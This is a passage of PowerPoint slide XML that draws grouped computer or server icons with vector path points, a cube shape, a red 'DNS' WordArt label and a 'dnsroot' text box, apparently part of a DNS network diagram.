                    <a:pt x="10966" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5982" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7311" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7975" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7975" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7145" y="9865"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8142" y="9865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8142" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="9865"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="8972" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12462" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="13625" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20271" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20271" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="18609" y="6463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20437" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20437" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="6463"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F5F1F1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9281" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59F8C50E-9D84-FA9F-D81B-EC90C331695F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10714425" y="4391396"/>
              <a:ext cx="278148" cy="107828"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="3600" kern="10">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9282" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2258845B-8F1D-F20A-9E23-37DBC156E437}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10432210" y="4653248"/>
              <a:ext cx="907197" cy="248402"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0" err="1"/>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9283" name="Gruppo 9282">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5E718AB-4E62-4D58-D9CF-5C9ADA41DB57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6310508" y="1227608"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9284" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D73B15C-F679-12AD-3606-33EEF1C205D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4306849"/>
              <a:ext cx="378624" cy="350441"/>
            </a:xfrm>
            <a:prstGeom prst="cube">
              <a:avLst>
                <a:gd name="adj" fmla="val 15116"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9285" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17A563EB-6786-153F-D84A-7E75D91EE3A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4360763"/>
              <a:ext cx="324710" cy="296527"/>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 name="T24" fmla="*/ 326 w 21600"/>
                <a:gd name="T25" fmla="*/ 22180 h 21600"/>
                <a:gd name="T26" fmla="*/ 21559 w 21600"/>
                <a:gd name="T27" fmla="*/ 27893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extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21600" y="10885"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10634" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10800" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="10885"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1163" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16449" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="2381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2160" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1994" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1994" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21600"/>
